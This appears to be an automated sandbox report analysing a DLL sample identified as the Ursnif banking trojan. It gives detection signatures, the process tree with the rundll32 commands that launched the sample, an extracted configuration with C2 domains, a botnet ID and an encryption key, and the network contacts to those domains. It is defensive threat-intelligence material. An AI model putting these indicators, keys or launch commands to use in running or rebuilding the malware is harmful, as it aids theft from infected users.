Loading ...

Play interactive tourEdit tour

Windows Analysis Report 6yDD19jMIu.dll

Overview

General Information

Sample Name:6yDD19jMIu.dll
Analysis ID:500309
MD5:903cf677ba834a968b42bd71e4626a9d
SHA1:c751f3ab4612917d15967fc1f0591e674c2e56ca
SHA256:b601a3c9c3a3df9043ea82733f1da5b413207d7585ca6b18baa8a4d923ce92d8
Tags:BRTdllgeoGoziISFBITAUrsnif
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for domain / URL
Writes or reads registry keys via WMI
Writes registry values via WMI
Uses 32bit PE files
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 4668 cmdline: loaddll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 1656 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 4712 cmdline: rundll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 892 cmdline: rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,BeGrass MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 3052 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 892 -s 636 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 1820 cmdline: rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,Fieldeight MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 2304 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1820 -s 640 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 4040 cmdline: rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,Often MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 4500 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4040 -s 636 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "UmEkthy8LQToWYBqtBaWyLn/P1d2KjpXi9nl2is1X7NEi7AW4Al92U7HvBiCwWHgXhs6UyTZ7q6npv3YCi+rPS7xAyorWWgcyyviEpE9CETDXviZ72XZkxmen4ztvEtct+obFAEe0tiXOsfOcC8xDsI0CHPpvmUknsexTYqAJgwcghgx1mGHx/yFM4fnPYw4mFFE6bVI7eMnbu1CuunRmAVRDHZ7MAS7zSkAmYjeo1zAzRnOEWgblRHwenmwlBtp0SFGuYCGVe3TZZ4Nndgpd5xpSeLOoSZi/fRXjtS8b6LXBS/zslRCRObMDjDX4pa1fM1uOgFHyvjANgWJpZ272bpOHjM52/hsEGZXskaNztU=", "c2_domain": ["msn.com/mail", "breuranel.website", "outlook.com/signup", "areuranel.website"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000003.477730310.0000000004C38000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000006.00000003.427656191.00000000033B0000.00000040.00000001.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
      00000000.00000003.484405458.0000000003598000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000000.00000003.484224135.0000000003598000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000000.00000003.483910009.0000000003598000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 30 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.3.rundll32.exe.70a31a.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              0.3.loaddll32.exe.caa31a.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                3.2.rundll32.exe.810000.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                  0.2.loaddll32.exe.30794a0.1.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                    3.3.rundll32.exe.70a31a.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                      Click to see the 16 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 00000006.00000003.427656191.00000000033B0000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "UmEkthy8LQToWYBqtBaWyLn/P1d2KjpXi9nl2is1X7NEi7AW4Al92U7HvBiCwWHgXhs6UyTZ7q6npv3YCi+rPS7xAyorWWgcyyviEpE9CETDXviZ72XZkxmen4ztvEtct+obFAEe0tiXOsfOcC8xDsI0CHPpvmUknsexTYqAJgwcghgx1mGHx/yFM4fnPYw4mFFE6bVI7eMnbu1CuunRmAVRDHZ7MAS7zSkAmYjeo1zAzRnOEWgblRHwenmwlBtp0SFGuYCGVe3TZZ4Nndgpd5xpSeLOoSZi/fRXjtS8b6LXBS/zslRCRObMDjDX4pa1fM1uOgFHyvjANgWJpZ272bpOHjM52/hsEGZXskaNztU=", "c2_domain": ["msn.com/mail", "breuranel.website", "outlook.com/signup", "areuranel.website"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: 6yDD19jMIu.dllVirustotal: Detection: 9%Perma Link
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: areuranel.websiteVirustotal: Detection: 6%Perma Link
                      Source: breuranel.websiteVirustotal: Detection: 6%Perma Link
                      Source: https://areuranel.website/Virustotal: Detection: 6%Perma Link
                      Source: 6yDD19jMIu.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.7:49749 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.7:49751 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.7:49771 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.101.124.210:443 -> 192.168.2.7:49772 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.223.66:443 -> 192.168.2.7:49773 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.7:49774 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.101.124.210:443 -> 192.168.2.7:49775 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.98.208.114:443 -> 192.168.2.7:49776 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.7:49810 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.7:49812 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.7:49842 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.219.162:443 -> 192.168.2.7:49843 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.137.114:443 -> 192.168.2.7:49844 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.7:49845 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.219.162:443 -> 192.168.2.7:49846 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.98.214.82:443 -> 192.168.2.7:49847 version: TLS 1.2
                      Source: 6yDD19jMIu.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: WinTypes.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: profapi.pdb& source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdb7 source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000013.00000003.471401917.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.464515303.0000000005490000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.497393205.00000000052F1000.00000004.00000001.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000013.00000003.471401917.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.474189859.0000000005741000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.497175120.00000000053F2000.00000004.00000040.sdmp
                      Source: Binary string: CoreMessaging.pdb_ source: WerFault.exe, 00000013.00000003.471624682.00000000051F2000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474313547.0000000005861000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497779494.0000000005404000.00000004.00000040.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000013.00000003.471401917.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.474189859.0000000005741000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.497393205.00000000052F1000.00000004.00000001.sdmp
                      Source: Binary string: WinTypes.pdbT) source: WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdbD source: WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000013.00000003.471684835.00000000051E0000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474387635.0000000005850000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497619087.00000000053F0000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000013.00000003.471401917.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.465473055.00000000035AC000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.477462780.000000000324C000.00000004.00000001.sdmp
                      Source: Binary string: ntmarta.pdb; source: WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdb0 source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 00000013.00000003.471774398.00000000051E4000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474406434.0000000005854000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497646774.00000000053F5000.00000004.00000040.sdmp
                      Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 00000013.00000003.471624682.00000000051F2000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474313547.0000000005861000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497779494.0000000005404000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdby' source: WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000013.00000003.471401917.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.474189859.0000000005741000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.497393205.00000000052F1000.00000004.00000001.sdmp
                      Source: Binary string: rundll32.pdbk source: WerFault.exe, 00000013.00000003.471401917.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.474189859.0000000005741000.00000004.00000001.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdbN source: WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp
                      Source: Binary string: ntmarta.pdbf) source: WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 00000013.00000003.471401917.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.474189859.0000000005741000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.497646774.00000000053F5000.00000004.00000040.sdmp
                      Source: Binary string: mpr.pdbM source: WerFault.exe, 00000013.00000003.471684835.00000000051E0000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdbk source: WerFault.exe, 00000017.00000003.497175120.00000000053F2000.00000004.00000040.sdmp
                      Source: Binary string: ntmarta.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000013.00000003.471401917.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.474189859.0000000005741000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.497175120.00000000053F2000.00000004.00000040.sdmp
                      Source: Binary string: fltLib.pdbR source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdb* source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000013.00000003.471401917.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.465197464.00000000035B8000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.497393205.00000000052F1000.00000004.00000001.sdmp
                      Source: Binary string: powrprof.pdb, source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: mpr.pdb source: WerFault.exe, 00000013.00000003.471684835.00000000051E0000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474387635.0000000005850000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497619087.00000000053F0000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000013.00000003.471401917.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.474189859.0000000005741000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.497393205.00000000052F1000.00000004.00000001.sdmp
                      Source: Binary string: setupapi.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdbz source: WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdbk source: WerFault.exe, 00000013.00000003.471774398.00000000051E4000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474406434.0000000005854000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497646774.00000000053F5000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000013.00000003.463108056.0000000002D40000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.465473055.00000000035AC000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.477462780.000000000324C000.00000004.00000001.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdbR source: WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdbX) source: WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000013.00000003.471401917.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.474189859.0000000005741000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.497393205.00000000052F1000.00000004.00000001.sdmp
                      Source: Binary string: shell32.pdbk source: WerFault.exe, 00000017.00000003.497646774.00000000053F5000.00000004.00000040.sdmp
                      Source: Binary string: mpr.pdbg source: WerFault.exe, 00000014.00000003.474387635.0000000005850000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000013.00000003.471774398.00000000051E4000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474406434.0000000005854000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497646774.00000000053F5000.00000004.00000040.sdmp
                      Source: Binary string: bcrypt.pdbX source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdbN source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000017.00000003.497175120.00000000053F2000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdbl) source: WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: WinTypes.pdb1 source: WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp
                      Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000013.00000003.471401917.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.474189859.0000000005741000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.497393205.00000000052F1000.00000004.00000001.sdmp
                      Source: Binary string: wUxTheme.pdb> source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp
                      Source: Binary string: c:\wheel\receive\Many-rise\score.pdb source: loaddll32.exe, 00000000.00000002.775494976.000000006E53B000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.776806344.000000006E53B000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.471242410.000000006E53B000.00000002.00020000.sdmp, 6yDD19jMIu.dll
                      Source: Binary string: advapi32.pdbH source: WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000013.00000003.471684835.00000000051E0000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474387635.0000000005850000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497619087.00000000053F0000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdbN source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000013.00000003.471774398.00000000051E4000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474406434.0000000005854000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497646774.00000000053F5000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000013.00000003.463129538.0000000002D4C000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.465197464.00000000035B8000.00000004.00000001.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000013.00000003.471684835.00000000051E0000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474387635.0000000005850000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497619087.00000000053F0000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000013.00000003.471684835.00000000051E0000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474387635.0000000005850000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497619087.00000000053F0000.00000004.00000040.sdmp
                      Source: Binary string: rundll32.pdb source: WerFault.exe, 00000013.00000003.471401917.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.474189859.0000000005741000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.497393205.00000000052F1000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000013.00000003.464251828.0000000002D46000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.465353270.00000000035B2000.00000004.00000001.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdb source: WerFault.exe, 00000013.00000003.471518313.00000000051E7000.00000004.00000040.sdmp, WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp, WerFault.exe, 00000017.00000003.497473195.00000000053F8000.00000004.00000040.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000013.00000003.471401917.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.474189859.0000000005741000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.497393205.00000000052F1000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000013.00000003.471401917.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.474189859.0000000005741000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.497393205.00000000052F1000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 00000013.00000003.471401917.00000000050D1000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000003.474189859.0000000005741000.00000004.00000001.sdmp
                      Source: Binary string: sfc.pdbd source: WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdbd source: WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdb\ source: WerFault.exe, 00000014.00000003.474434490.0000000005857000.00000004.00000040.sdmp

                      Networking:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 52.97.219.162 187
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: areuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 40.97.161.50 187
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: breuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: outlook.office365.com
